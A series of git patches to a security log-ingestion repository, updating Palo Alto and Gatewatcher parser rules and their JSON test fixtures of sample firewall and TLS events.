+    "message": "1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no\n",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Palo Alto NGFW",
+        "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd"
+      }
+    }
+  },
+  "expected": {
+    "message": "1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no\n",
+    "event": {
+      "action": "allow",
+      "category": [
+        "network"
+      ],
+      "dataset": "decryption",
+      "outcome": "success",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-11-03T19:09:43Z",
+    "action": {
+      "name": "allow",
+      "outcome": "success",
+      "type": "0"
+    },
+    "destination": {
+      "address": "5.6.7.8",
+      "ip": "5.6.7.8",
+      "nat": {
+        "ip": "8.7.6.5",
+        "port": 443
+      },
+      "port": 443
+    },
+    "log": {
+      "hostname": "NFW-OUT-DCA",
+      "logger": "decryption"
+    },
+    "network": {
+      "application": "ssl",
+      "transport": "tcp"
+    },
+    "observer": {
+      "name": "NFW-OUT-DCA",
+      "product": "PAN-OS",
+      "serial_number": "111111111111"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "53",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "Threat_ContentType": "0",
+      "VirtualLocation": "vsys1",
+      "VirtualSystemID": "1",
+      "tls": {
+        "chain_status": "Uninspected",
+        "root_status": "uninspected"
+      }
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4",
+        "4.3.2.1",
+        "5.6.7.8",
+        "8.7.6.5"
+      ],
+      "user": [
+        "jdoe"
+      ]
+    },
+    "rule": {
+      "name": "URL Filtering - Chrome Profile"
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4",
+      "nat": {
+        "ip": "4.3.2.1",
+        "port": 22814
+      },
+      "port": 55107,
+      "user": {
+        "name": "jdoe"
+      }
+    },
+    "tls": {
+      "version": "1.3"
+    },
+    "user": {
+      "name": "jdoe"
+    }
+  }
+}
\ No newline at end of file

From 84cf60f3488d4312a1f07df55bbcd5eae87e2e30 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Thu, 21 Nov 2024 17:14:17 +0100
Subject: [PATCH 267/317] fix(GateWatcher): lint taxonomy

---
 GateWatcher/aioniq/_meta/fields.yml | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/GateWatcher/aioniq/_meta/fields.yml b/GateWatcher/aioniq/_meta/fields.yml
index 07bae26e7..8bc01d294 100644
--- a/GateWatcher/aioniq/_meta/fields.yml
+++ b/GateWatcher/aioniq/_meta/fields.yml
@@ -389,16 +389,16 @@ gatewatcher.tls:
   name: gatewatcher.tls
   type: text
 
-gatewatcher.tls_sni:
-  description: This field represents the TLS SNI field in a TLS metadata
-  name: gatewatcher.tls_sni
-  type: text
-
 gatewatcher.tls_fingerprint:
   description: This field represents the TLS server fingerprint field in a TLS metadata
   name: gatewatcher.tls_fingerprint
   type: text
 
+gatewatcher.tls_sni:
+  description: This field represents the TLS SNI field in a TLS metadata
+  name: gatewatcher.tls_sni
+  type: text
+
 gatewatcher.ttp:
   description: This field is used for retrohunt alerts
   name: gatewatcher.ttp

From 941d5826e98ca34ac5c66d22b6e2235eafbdf8b6 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Thu, 21 Nov 2024 17:28:16 +0100
Subject: [PATCH 268/317] test(GateWatcher): Improve support of tls events

---
 GateWatcher/aioniq/ingest/parser.yml      |  1 +
 GateWatcher/aioniq/tests/sigflow-tls.json | 68 +++++++++++++++++++++++
 2 files changed, 69 insertions(+)
 create mode 100644 GateWatcher/aioniq/tests/sigflow-tls.json

diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml
index 3cc13d747..869a7f8f3 100644
--- a/GateWatcher/aioniq/ingest/parser.yml
+++ b/GateWatcher/aioniq/ingest/parser.yml
@@ -215,3 +215,4 @@ stages:
          gatewatcher.tls_fingerprint: "{{json_load.message.tls.fingerprint}}"
          tls.version: "{{json_load.message.tls.version}}"
          tls.server.not_after: "{{json_load.message.tls.notafter}}"
+         tls.server.ja3s: "{{json_load.message.tls.ja3s.hash}}"
diff --git a/GateWatcher/aioniq/tests/sigflow-tls.json b/GateWatcher/aioniq/tests/sigflow-tls.json
new file mode 100644
index 000000000..ff8624608
--- /dev/null
+++ b/GateWatcher/aioniq/tests/sigflow-tls.json
@@ -0,0 +1,68 @@
+{
+  "input": {
+    "message": "{\"uuid\":\"b96777f9-6409-4864-b8a1-452094a93c5d\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"ether\":{\"dest_mac\":\"e6:43:7e:91:1b:92\",\"src_mac\":\"82:df:ee:4f:81:af\"},\"type\":\"suricata\",\"dest_ip\":\"5.6.7.8\",\"src_port\":64809,\"flow_id\":1366008699485799,\"timestamp_analyzed\":\"2024-11-21T13:02:44.291Z\",\"timestamp\":\"2024-11-21T13:02:02.870913+0000\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"event_type\":\"tls\",\"src_ip\":\"1.2.3.4\",\"dest_port\":443,\"in_iface\":\"mon2\",\"tls\":{\"sni\":\"www.microsoft.com\",\"version\":\"TLS 1.3\",\"ja3s\":{\"string\":\"771,4866,43-51\",\"hash\":\"15af977ce25de452b96affa2addb1036\"}},\"@version\":\"1\",\"proto\":\"TCP\",\"gcap\":\"gcap-xxxxxxxxx.domain.local\",\"@timestamp\":\"2024-11-21T13:02:44.291Z\"}\n",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Gatewatcher AionIQ v102",
+        "dialect_uuid": "bba2bed2-d925-440f-a0ce-dbcae04eaf26"
+      }
+    }
+  },
+  "expected": {
+    "message": "{\"uuid\":\"b96777f9-6409-4864-b8a1-452094a93c5d\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"ether\":{\"dest_mac\":\"e6:43:7e:91:1b:92\",\"src_mac\":\"82:df:ee:4f:81:af\"},\"type\":\"suricata\",\"dest_ip\":\"5.6.7.8\",\"src_port\":64809,\"flow_id\":1366008699485799,\"timestamp_analyzed\":\"2024-11-21T13:02:44.291Z\",\"timestamp\":\"2024-11-21T13:02:02.870913+0000\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"event_type\":\"tls\",\"src_ip\":\"1.2.3.4\",\"dest_port\":443,\"in_iface\":\"mon2\",\"tls\":{\"sni\":\"www.microsoft.com\",\"version\":\"TLS 1.3\",\"ja3s\":{\"string\":\"771,4866,43-51\",\"hash\":\"15af977ce25de452b96affa2addb1036\"}},\"@version\":\"1\",\"proto\":\"TCP\",\"gcap\":\"gcap-xxxxxxxxx.domain.local\",\"@timestamp\":\"2024-11-21T13:02:44.291Z\"}\n",
+    "event": {
+      "category": [
+        "network"
+      ],
+      "module": "tls"
+    },
+    "destination": {
+      "address": "5.6.7.8",
+      "ip": "5.6.7.8",
+      "port": 443
+    },
+    "gatewatcher": {
+      "event_type": "tls",
+      "flow_id": "1366008699485799",
+      "gcap": "gcap-xxxxxxxxx.domain.local",
+      "gcenter": "gcenter-xxxxxxxx.domain.local",
+      "timestamp_analyzed": "2024-11-21T13:02:44.291Z",
+      "tls": "{\"ja3s\": {\"hash\": \"15af977ce25de452b96affa2addb1036\", \"string\": \"771,4866,43-51\"}, \"sni\": \"www.microsoft.com\", \"version\": \"TLS 1.3\"}",
+      "tls_sni": "www.microsoft.com",
+      "type": "suricata"
+    },
+    "network": {
+      "transport": "TCP"
+    },
+    "observer": {
+      "hostname": "gcap-xxxxxxxxx.domain.local",
+      "mac": [
+        "82:df:ee:4f:81:af",
+        "e6:43:7e:91:1b:92"
+      ],
+      "name": "gcap-xxxxxxxxx.domain.local",
+      "type": "ids",
+      "version": "0.2"
+    },
+    "related": {
+      "hosts": [
+        "gcap-xxxxxxxxx.domain.local"
+      ],
+      "ip": [
+        "1.2.3.4",
+        "5.6.7.8"
+      ]
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4",
+      "port": 64809
+    },
+    "tls": {
+      "server": {
+        "ja3s": "15af977ce25de452b96affa2addb1036"
+      },
+      "version": "TLS 1.3"
+    }
+  }
+}
\ No newline at end of file

From bd97efb6cdc757fa14e48c692ee1cdcfdc568f23 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Thu, 21 Nov 2024 17:33:23 +0100
Subject: [PATCH 269/317] fix(GateWatcher): lint parser

---
 GateWatcher/aioniq/ingest/parser.yml | 20 ++++++++++----------
 1 file changed, 10 insertions(+), 10 deletions(-)

diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml
index 869a7f8f3..845abe396 100644
--- a/GateWatcher/aioniq/ingest/parser.yml
+++ b/GateWatcher/aioniq/ingest/parser.yml
@@ -206,13 +206,13 @@ stages:
   tls:
     actions:
       - set:
-         tls.server.issuer: "{{json_load.message.tls.issuerdn}}"
-         tls.server.not_before: "{{json_load.message.tls.notbefore}}"
-         tls.server.certificate_chain: "{{json_load.message.tls.chain}}"
-         tls.server.subject: "{{json_load.message.tls.subject}}"
-         gatewatcher.tls: "{{json_load.message.tls}}"
-         gatewatcher.tls_sni: "{{json_load.message.tls.sni}}"
-         gatewatcher.tls_fingerprint: "{{json_load.message.tls.fingerprint}}"
-         tls.version: "{{json_load.message.tls.version}}"
-         tls.server.not_after: "{{json_load.message.tls.notafter}}"
-         tls.server.ja3s: "{{json_load.message.tls.ja3s.hash}}"
+          tls.server.issuer: "{{json_load.message.tls.issuerdn}}"
+          tls.server.not_before: "{{json_load.message.tls.notbefore}}"
+          tls.server.certificate_chain: "{{json_load.message.tls.chain}}"
+          tls.server.subject: "{{json_load.message.tls.subject}}"
+          gatewatcher.tls: "{{json_load.message.tls}}"
+          gatewatcher.tls_sni: "{{json_load.message.tls.sni}}"
+          gatewatcher.tls_fingerprint: "{{json_load.message.tls.fingerprint}}"
+          tls.version: "{{json_load.message.tls.version}}"
+          tls.server.not_after: "{{json_load.message.tls.notafter}}"
+          tls.server.ja3s: "{{json_load.message.tls.ja3s.hash}}"

From e80062d46eef52b2721efe3f4b17c0a01dace43b Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Thu, 21 Nov 2024 17:45:07 +0100
Subject: [PATCH 270/317] chore(PAloaAlto): name some columns

---
 .../paloalto-prisma-access/ingest/parser.yml           | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
index 113ef7fdb..7c7de00b8 100644
--- a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml	
+++ b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml	
@@ -142,7 +142,7 @@ pipeline:
         input_field: original.message
         output_field: message
         columnnames:
-          - FUTURE_USER
+          - PaloAltoDomain
           - ReceiveTime
           - DeviceSN
           - Type
@@ -187,12 +187,12 @@ pipeline:
         input_field: original.message
         output_field: message
         columnnames:
-          - FUTURE_USE
+          - PaloAltoDomain
           - ReceiveTime
           - DeviceSN
           - Type
           - Subtype
-          - FUTURE_USE
+          - ConfigVersion
           - GeneratedTime
           - VirtualLocation
           - EventID
@@ -235,12 +235,12 @@ pipeline:
         input_field: original.message
         output_field: message
         columnnames:
-          - FUTURE_USE
+          - PaloAltoDomain
           - ReceiveTime
           - DeviceSN
           - Type
           - Subtype
-          - FUTURE_USE
+          - ConfigVersion
           - GeneratedTime
           - VirtualLocation
           - EventID

From 838a83c453d43ea013f72192a71ffd3350af2fba Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Thu, 21 Nov 2024 17:46:41 +0100
Subject: [PATCH 271/317] fix(PaloAlto): fix the definition of the user
 properties

---
 .../paloalto-prisma-access/ingest/parser.yml               | 4 ++--
 .../paloalto-prisma-access/tests/decryption_cef.json       | 5 +++--
 .../paloalto-prisma-access/tests/fix_bug_with_int.json     | 5 +++--
 .../paloalto-prisma-access/tests/globalprotect_csv_2.json  | 5 +++--
 .../paloalto-prisma-access/tests/test_globalprotect.json   | 7 ++++---
 .../paloalto-prisma-access/tests/test_userid.json          | 6 +++---
 6 files changed, 18 insertions(+), 14 deletions(-)

diff --git a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
index 7c7de00b8..84514974e 100644
--- a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml	
+++ b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml	
@@ -798,8 +798,8 @@ stages:
   set_finalize_user_name:
     actions:
       - set:
-          user.domain: '{{final.user.name.split("\\") | first}}'
-          user.name: '{{final.user.name.split("\\") | last}}'
+          user.domain: '{{final.user.name.split("\\") | last}}'
+          user.name: '{{final.user.name.split("\\") | first}}'
         filter: '{{final.user.name != null and "\\" in final.user.name}}'
       - set:
           user.domain: '{{final.user.email.split("@") | first}}'
diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/decryption_cef.json b/Palo Alto Networks/paloalto-prisma-access/tests/decryption_cef.json
index 1a4fba4b4..b32ea4d13 100644
--- a/Palo Alto Networks/paloalto-prisma-access/tests/decryption_cef.json	
+++ b/Palo Alto Networks/paloalto-prisma-access/tests/decryption_cef.json	
@@ -69,6 +69,7 @@
         "1.1.1.1"
       ],
       "user": [
+        "paloaltonetwork",
         "xxxxx"
       ]
     },
@@ -90,8 +91,8 @@
       }
     },
     "user": {
-      "domain": "paloaltonetwork",
-      "name": "xxxxx"
+      "domain": "xxxxx",
+      "name": "paloaltonetwork"
     }
   }
 }
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_with_int.json b/Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_with_int.json
index 512ae89e7..37c8000b9 100644
--- a/Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_with_int.json	
+++ b/Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_with_int.json	
@@ -62,6 +62,7 @@
         "5.6.7.8"
       ],
       "user": [
+        "domain",
         "pusername",
         "userdest"
       ]
@@ -86,8 +87,8 @@
       }
     },
     "user": {
-      "domain": "domain",
-      "name": "pusername"
+      "domain": "pusername",
+      "name": "domain"
     }
   }
 }
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json
index e4b1d5fab..e0cb016eb 100644
--- a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json	
+++ b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json	
@@ -46,6 +46,7 @@
         "88.120.236.74"
       ],
       "user": [
+        "example.org",
         "test"
       ]
     },
@@ -61,8 +62,8 @@
       }
     },
     "user": {
-      "domain": "example.org",
-      "name": "test"
+      "domain": "test",
+      "name": "example.org"
     },
     "user_agent": {
       "os": {
diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json
index f08a677ef..5cc8690a2 100644
--- a/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json	
+++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json	
@@ -49,7 +49,8 @@
         "1.2.3.4"
       ],
       "user": [
-        "JDOE"
+        "JDOE",
+        "test.fr"
       ]
     },
     "source": {
@@ -64,8 +65,8 @@
       }
     },
     "user": {
-      "domain": "test.fr",
-      "name": "JDOE"
+      "domain": "JDOE",
+      "name": "test.fr"
     },
     "user_agent": {
       "os": {
diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_userid.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_userid.json
index dee27d0e1..48cbcdca5 100644
--- a/Palo Alto Networks/paloalto-prisma-access/tests/test_userid.json	
+++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_userid.json	
@@ -44,7 +44,7 @@
         "1.2.3.4"
       ],
       "user": [
-        "JDOE"
+        "test.fr"
       ]
     },
     "source": {
@@ -53,8 +53,8 @@
       "port": 0
     },
     "user": {
-      "domain": "test.fr",
-      "name": "JDOE"
+      "domain": "JDOE",
+      "name": "test.fr"
     }
   }
 }
\ No newline at end of file

From 497fb289a176e5b2a21ed5e52b294cc18afd8120 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Thu, 21 Nov 2024 17:47:10 +0100
Subject: [PATCH 272/317] test(PaloAlto): add test for hipmatch event in json
 representation

---
 .../tests/test_hipmatch_json.json             | 72 +++++++++++++++++++
 1 file changed, 72 insertions(+)
 create mode 100644 Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json

diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json
new file mode 100644
index 000000000..45f8d34f8
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json	
@@ -0,0 +1,72 @@
+{
+  "input": {
+    "message": "{\"TimeReceived\":\"2024-11-20T16:30:32.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"HIPMATCH\",\"Subtype\":\"hipmatch\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:30:28.000000Z\",\"SourceUser\":\"jdoe@example.org\",\"VirtualLocation\":\"vsys1\",\"EndpointDeviceName\":\"DESKTOP-01\",\"EndpointOSType\":\"Windows\",\"SourceIP\":\"1.2.3.4\",\"HipMatchName\":\"VPN Compliant\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"HipMatchType\":\"profile\",\"SequenceNo\":1111111111111111111,\"DGHierarchyLevel1\":12,\"DGHierarchyLevel2\":22,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"FW-ALK01\",\"VirtualSystemID\":1,\"SourceIPv6\":\"\",\"HostID\":\"3a7393a4-997f-4e5b-b6e4-4ebff71dacf4\",\"EndpointSerialNumber\":\"aefee8\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceMac\":null,\"SourceDeviceHost\":null,\"Source\":null,\"TimestampDeviceIdentification\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:30:28.904000Z\"}\n",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Palo Alto Prisma access",
+        "dialect_uuid": "ea265b9d-fb48-4e92-9c26-dcfbf937b630"
+      }
+    }
+  },
+  "expected": {
+    "message": "{\"TimeReceived\":\"2024-11-20T16:30:32.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"HIPMATCH\",\"Subtype\":\"hipmatch\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:30:28.000000Z\",\"SourceUser\":\"jdoe@example.org\",\"VirtualLocation\":\"vsys1\",\"EndpointDeviceName\":\"DESKTOP-01\",\"EndpointOSType\":\"Windows\",\"SourceIP\":\"1.2.3.4\",\"HipMatchName\":\"VPN Compliant\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"HipMatchType\":\"profile\",\"SequenceNo\":1111111111111111111,\"DGHierarchyLevel1\":12,\"DGHierarchyLevel2\":22,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"FW-ALK01\",\"VirtualSystemID\":1,\"SourceIPv6\":\"\",\"HostID\":\"3a7393a4-997f-4e5b-b6e4-4ebff71dacf4\",\"EndpointSerialNumber\":\"aefee8\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceMac\":null,\"SourceDeviceHost\":null,\"Source\":null,\"TimestampDeviceIdentification\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:30:28.904000Z\"}\n",
+    "event": {
+      "category": [
+        "network"
+      ],
+      "dataset": "hipmatch",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-11-20T16:30:28Z",
+    "action": {
+      "type": "hipmatch"
+    },
+    "host": {
+      "name": "DESKTOP-01"
+    },
+    "log": {
+      "hostname": "FW-ALK01",
+      "logger": "hipmatch"
+    },
+    "observer": {
+      "name": "FW-ALK01",
+      "product": "PAN-OS",
+      "serial_number": "no-serial"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "12",
+      "DGHierarchyLevel2": "22",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "Threat_ContentType": "hipmatch",
+      "VirtualLocation": "vsys1",
+      "VirtualSystemID": "1",
+      "endpoint": {
+        "serial_number": "aefee8"
+      }
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4"
+      ],
+      "user": [
+        "example.org",
+        "jdoe@example.org"
+      ]
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4",
+      "user": {
+        "name": "jdoe@example.org"
+      }
+    },
+    "user": {
+      "domain": "jdoe",
+      "email": "jdoe@example.org",
+      "name": "example.org"
+    }
+  }
+}
\ No newline at end of file

From e314c268cf04780877f6b195703ac7f420bfa0b2 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Thu, 21 Nov 2024 17:48:59 +0100
Subject: [PATCH 273/317] fix(PaloAlto): extract host id and rule name for
 HIPMatch

---
 Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml   | 4 ++--
 .../paloalto-prisma-access/tests/globalprotect_csv.json       | 1 +
 .../paloalto-prisma-access/tests/globalprotect_csv_2.json     | 1 +
 .../paloalto-prisma-access/tests/test_globalprotect.json      | 1 +
 .../paloalto-prisma-access/tests/test_hipmatch_json.json      | 4 ++++
 .../paloalto-prisma-access/tests/test_new_globalprotect.json  | 1 +
 6 files changed, 10 insertions(+), 2 deletions(-)

diff --git a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
index 84514974e..07492992b 100644
--- a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml	
+++ b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml	
@@ -577,7 +577,7 @@ stages:
           event.module: "{{parsed_description.message.module}}"
           host.hostname: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName}}"
           host.name: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName or parsed_event.message.LogSourceName or parsed_event.message.MachineName or parsed_event.message.shost or parsed_event.message.EndpointDeviceName or parsed_event.message.SourceDeviceHost}}"
-          host.id: "{{parsed_event.message.deviceExternalId}}"
+          host.id: "{{parsed_event.message.deviceExternalId or parsed_event.message.HostID}}"
           host.mac: "{{parsed_event.message.PanOSSourceDeviceMac or parsed_event.message.SourceDeviceMac}}"
           host.os.family: "{{parsed_event.message.PanOSSourceDeviceOSFamily}}"
           host.os.version: "{{parsed_event.message.PanOSSourceDeviceOSVersion or parsed_event.message.ClientOSVersion or parsed_event.message.SourceDeviceOSVersion}}"
@@ -602,7 +602,7 @@ stages:
           observer.version: "{{parsed_event.message.DeviceVersion or parsed_event.message.GlobalProtectClientVersion}}"
           observer.serial_number: "{{parsed_event.message.DeviceSN}}"
           observer.name: "{{parsed_event.message.DeviceName}}"
-          rule.name: "{{parsed_event.message.Rule}}"
+          rule.name: "{{parsed_event.message.Rule or parsed_event.message.HipMatchName}}"
           rule.uuid: "{{parsed_event.message.PanOSRuleUUID or parsed_event.message.RuleUUID}}"
           source.bytes: "{{parsed_event.message.BytesSent or parsed_event.message.in}}"
 
diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv.json
index 65f2b6940..127226ee3 100644
--- a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv.json	
+++ b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv.json	
@@ -21,6 +21,7 @@
       "type": "0"
     },
     "host": {
+      "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeee",
       "name": "AAAABBBBB",
       "os": {
         "version": "Microsoft Windows 10 Pro , 64-bit"
diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json
index e0cb016eb..e51f19fbb 100644
--- a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json	
+++ b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json	
@@ -21,6 +21,7 @@
       "type": "0"
     },
     "host": {
+      "id": "8f0fd1d3-5d3b-49c3-9bee-247ff89a52f3",
       "name": "2021-02707",
       "os": {
         "version": "Microsoft Windows 10 Enterprise , 64-bit"
diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json
index 5cc8690a2..70c31c202 100644
--- a/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json	
+++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json	
@@ -21,6 +21,7 @@
       "type": "0"
     },
     "host": {
+      "id": "662f0b44-e024-4a70",
       "name": "2023-01724",
       "os": {
         "version": "Microsoft Windows 10 Enterprise , 64-bit"
diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json
index 45f8d34f8..fd4e5a75f 100644
--- a/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json	
+++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json	
@@ -24,6 +24,7 @@
       "type": "hipmatch"
     },
     "host": {
+      "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4",
       "name": "DESKTOP-01"
     },
     "log": {
@@ -56,6 +57,9 @@
         "jdoe@example.org"
       ]
     },
+    "rule": {
+      "name": "VPN Compliant"
+    },
     "source": {
       "address": "1.2.3.4",
       "ip": "1.2.3.4",
diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_new_globalprotect.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_new_globalprotect.json
index 25db7ff0a..c0622d09c 100644
--- a/Palo Alto Networks/paloalto-prisma-access/tests/test_new_globalprotect.json	
+++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_new_globalprotect.json	
@@ -25,6 +25,7 @@
       "type": "globalprotect"
     },
     "host": {
+      "id": "e4f14dfd-bd3c-40e5-9c4e",
       "name": "LNL-test"
     },
     "log": {

From fd17ed126f555368791cad8216454c1bb8fd7d33 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Thu, 21 Nov 2024 17:51:21 +0100
Subject: [PATCH 274/317] fix(PaloAlto): add support for HipMatch dsv events

---
 .../paloalto-prisma-access/ingest/parser.yml  | 43 +++++++++++
 .../tests/test_hipmatch_csv.json              | 73 +++++++++++++++++++
 2 files changed, 116 insertions(+)
 create mode 100644 Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_csv.json

diff --git a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
index 07492992b..63f72e8e0 100644
--- a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml	
